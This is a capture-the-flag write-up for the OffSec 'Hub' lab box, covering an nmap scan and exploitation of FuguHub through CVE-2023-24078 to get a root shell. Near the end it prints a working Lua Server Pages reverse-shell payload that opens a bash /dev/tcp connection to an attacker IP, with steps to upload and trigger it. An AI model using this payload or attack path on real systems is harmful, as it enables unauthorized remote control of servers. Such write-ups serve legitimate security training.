Hub

Intro

Hub was classified as an 'Easy' box by OffSec, and follows a relatively straightforward attack path. After scanning open services, I identified a web service named 'FuguHub' which had a known CVE. Exploiting this CVE resulted in a reverse shell with root access.

Intial Foothold

Nmap Scan

I began by running an nmap scan to identify open ports:

# Nmap 7.94 scan initiated Fri Dec  8 10:25:10 2023 as: nmap -sC -sV -oA nmap/initial -vv hub.pg
Nmap scan report for hub.pg (192.168.210.25)
Host is up, received echo-reply ttl 61 (0.058s latency).
Scanned at 2023-12-08 10:25:11 CST for 22s
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 61 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDNEbgprJqVJa8R95Wkbo3cemB4fdRzos+v750LtPEnRs+IJQn5jcg5l89Tx4junU+AXzLflrMVo55gbuKeNTDtFRU9ltlIu4AU+f7lRlUlvAHlNjUbU/z3WBZ5ZU9j7Xc9WKjh1Ov7chC0UnDdyr5EGrIwlLzgk8zrWx364+S4JqLtER2/n0rhVxa9RCw0tR/oL24kMep4q7rFK6dThiRtQ9nsJFhh6yw8Fmdg7r4uohqH70UJurVwVNwFqtr/86e4VSSoITlMQPZrZFVvoSsjyL8LEODt1qznoLWudMD95Eo1YFSPID5VcS0kSElfYigjSr+9bNSdlzAof1mU6xJA67BggGNu6qITWWIJySXcropehnDAt2nv4zaKAUKc/T0ij9wkIBskuXfN88cEmZbu+gObKbLgwQSRQJIpQ+B/mA8CD4AiaTmEwGSWz1dVPp5Fgb6YVy6E4oO9ASuD9Q1JWuRmnn8uiHF/nPLs2LC2+rh3nPLXlV+MG/zUfQCrdrE=
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCUhhvrIBs53SApXKZYHWBlpH50KO3POt8Y+WvTvHZ5YgRagAEU5eSnGkrnziCUvDWNShFhLHI7kQv+mx+4R6Wk=
|   256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN4MSEXnpONsc0ANUT6rFQPWsoVmRW4hrpSRq++xySM9
80/tcp   open  http     syn-ack ttl 61 nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.18.0
8082/tcp open  http     syn-ack ttl 61 Barracuda Embedded Web Server
|_http-favicon: Unknown favicon MD5: FDF624762222B41E2767954032B6F1FF
|_http-server-header: BarracudaServer.com (Posix)
|_http-title: Home
| http-webdav-scan: 
|   Server Type: BarracudaServer.com (Posix)
|   WebDAV type: Unknown
|   Server Date: Fri, 08 Dec 2023 16:25:29 GMT
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
| http-methods: 
|   Supported Methods: OPTIONS GET HEAD PROPFIND PATCH POST PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
9999/tcp open  ssl/http syn-ack ttl 61 Barracuda Embedded Web Server
|_http-favicon: Unknown favicon MD5: FDF624762222B41E2767954032B6F1FF
|_http-title: Home
| http-webdav-scan: 
|   Server Type: BarracudaServer.com (Posix)
|   WebDAV type: Unknown
|   Server Date: Fri, 08 Dec 2023 16:25:30 GMT
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
| http-methods: 
|   Supported Methods: OPTIONS GET HEAD PROPFIND PATCH POST PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
| ssl-cert: Subject: commonName=FuguHub/stateOrProvinceName=California/countryName=US
| Subject Alternative Name: DNS:FuguHub, DNS:FuguHub.local, DNS:localhost
| Issuer: commonName=Real Time Logic Root CA/organizationName=Real Time Logic LLC/countryName=US/organizationalUnitName=SharkSSL/emailAddress=ginfo@realtimelogic.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-07-16T19:15:09
| Not valid after:  2074-04-18T19:15:09
| MD5:   6320:2067:19be:be32:18ce:3a61:e872:cc3f
| SHA-1: 503c:a62d:8a8c:f8c1:6555:ec50:77d1:73cc:0865:ec62
| -----BEGIN CERTIFICATE-----
| MIIEfDCCA2SgAwIBAgIBEDANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMx
| HDAaBgNVBAoTE1JlYWwgVGltZSBMb2dpYyBMTEMxETAPBgNVBAsTCFNoYXJrU1NM
| MSAwHgYDVQQDExdSZWFsIFRpbWUgTG9naWMgUm9vdCBDQTEmMCQGCSqGSIb3DQEJ
| ARYXZ2luZm9AcmVhbHRpbWVsb2dpYy5jb20wIBcNMTkwNzE2MTkxNTA5WhgPMjA3
| NDA0MTgxOTE1MDlaMDQxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlh
| MRAwDgYDVQQDDAdGdWd1SHViMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
| AQEA2uaLiecelbCvdPpZcmweQmK+rcxjFwKKx+ButcLc/vgDTbbDDsg9Pfn78RNE
| hrM1WsvkGXKgJY2M9tzTB6o27pUipwfYAA8a4mV7wfM+YGOVuC05t3oh3+GtSciQ
| ZNDEX3cSZ5XanKPNe9vNBNtFiC5ujadbsLWJxC4mHR9fnx3fPlhQO25QBcX+0M1h
| vOwsidZaqyl+R1zMOi/6IpJJobTJMRKT23N61q3ZKeJnZM2JK9H2srC8tRlIidpf
| Iu3Sv7St3Hg2VzbtlEDpGdISZTwpB+MIgvcZ2Z5IVfnhYJlQlNGHbg8jnegA07VE
| AsfkNlyMfVO88TCo5fLhE6wZLwIDAQABo4IBQDCCATwwHQYDVR0OBBYEFI5fqYOD
| ozZher2qQbU3//9gzTIyMIG1BgNVHSMEga0wgaqAFHlYmIP3mqIAiKOI3DxqZo3k
| KQKGoYGOpIGLMIGIMQswCQYDVQQGEwJVUzEcMBoGA1UEChMTUmVhbCBUaW1lIExv
| Z2ljIExMQzERMA8GA1UECxMIU2hhcmtTU0wxIDAeBgNVBAMTF1JlYWwgVGltZSBM
| b2dpYyBSb290IENBMSYwJAYJKoZIhvcNAQkBFhdnaW5mb0ByZWFsdGltZWxvZ2lj
| LmNvbYIBADAJBgNVHRMEAjAAMAsGA1UdDwQEAwIDqDAdBgNVHSUEFjAUBggrBgEF
| BQcDAgYIKwYBBQUHAwEwLAYDVR0RBCUwI4IHRnVndUh1YoINRnVndUh1Yi5sb2Nh
| bIIJbG9jYWxob3N0MA0GCSqGSIb3DQEBCwUAA4IBAQBsn2vzaK/2bKmWJ52FiRVw
| K3NxCqQrxHjXp2nJFc0S05XnCUqN5RbTgyhv0a8ODniaiJbXAaJC34Ot+v6UMeWE
| CHmZgjbZUvsrQiEUz+i0fegtwp+zgSOlb6t+g3lPGTzBjlFUfb0gaRSxSoI42apG
| QBwoN1haaHhm6THC7DIYmFiOgRiQfitiTf9FtbwTTfrLnVm3e3dCuwCmkcDgBZE1
| Q0M4pGSS3vWTQxF6oyYNe7mhtvGeG7qYE6amtF9iuiUt0MrH4hXTMfHcjHdRULgc
| 1a3vVPwl5CZsQRz40OPrQVtF7rcXRNWsU/1ze9r1sgeLxvjWmbW0GByKJ+jnHALy
|_-----END CERTIFICATE-----
|_http-server-header: BarracudaServer.com (Posix)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec  8 10:25:33 2023 -- 1 IP address (1 host up) scanned in 22.64 seconds

This revealed an OpenSSH service on port 22, nginx running on port 80, and two Barracuda Web Server instances running on ports 8082 and 9999.

Examining HTTP Services

Performing a brief review of port 80, I was met with a HTTP 403 'Forbidden' response. Additionally, there was no robots.txt page available:

Performing a brief review of port 9999, I was met with a page that appeared to be raw data which was not human readable:

Finally, reviewing port 8082, there appeared to be an instance of the 'FuguHub' web application hosted. After waiting on the landing page for a few seconds, I was prompted to create an Administrator account for this application:

Exploiting FuguHub

Attempt #1

Searching for 'FuguHub' in searchsploit revealed an exploit existed for versions 8.1 and lower of this application:

When I first reviewed this exploit, I did not entirely understand the attack path. Revewing it in hindsight, it appears to adhere to the following steps:

  1. Check if an account already exists

  2. Create an account

  3. Login as the newly created account

  4. Upload a reverse shell file to the /fs/cmsdocs directory

  5. Send a GET request for the newly created file to trigger code execution

However, while the exploit included a command-line argument for the remote port that the application was hosted on, several portions of the exploit code still used a hard-coded value of 443 for the remote port. I attempted to modify the exploit code to account for the command-line argument, but was ultimately unable to get this to work.

Attempt #2

I found another exploit for CVE-2023-24078, which conventiently had a demo video on the README page of its GitHub repository. This exploit uses browser automation via Selenium to accomplish the actions of:

  • creating a reverse shell script in LUA

  • checking if an account already exists

  • creating an account

  • locating the filesharing component of the site, and

  • displaying the URL by which the file share can be accessed using a WebDAV client

The exploit then provides instructions to open the file share using the cadaver WebDAV client, changing directory, authenticating as the newly created administrative account, and uploading the reverse shell script.

Once these actions are completed, the exploit script prompts you to open a netcat listener and press ENTER within the exploit script execution window. This then causes the script to send an HTTP GET request to the location of our uploaded reverse shell script on the webserver, which is then executed on the server, and we catch a root shell in our netcat listener!

Reproducing the Exploit Manually

After I was able to get this final exploit script to work, I reviewed the actions it was taking and finally gained a better understanding of the attack path. Additionally, I was able to gain some insight from the this writeup on the vulnerability, which I was linked to from the NIST National Vulnerability Database page on this CVE.

I was then able to reproduce the exploit through browser interactions after starting my netcat listener:

  • Navigate to the /fs directory and login as the admin account we created

  • Upload the LUA reverse shell script

  • Navigate to the /lua-revshell.lsp URI to trigger execution

The contents of the reverse shell I used are listed below:

<div sytle="margin-leftLauto;margin-right: auth;width: 350px;">
 <div id="info">
 <h2>Lua Server Pages Reverse Shell</h2>
 <p>haha</p>
 </div>
 <?lsp if request:method() == "GET" then ?>
        <?lsp os.execute("bash -c 'bash -i >& /dev/tcp/192.168.45.199/9001 0>&1'")?>
 <?lsp else ?>
        you sent a <?lsp=request:method() ?> request
 <?lsp end ?>
 </div>  

Privilege Escalation

No privilege escalation was required on this box, as our initial shell granted root access.

Last updated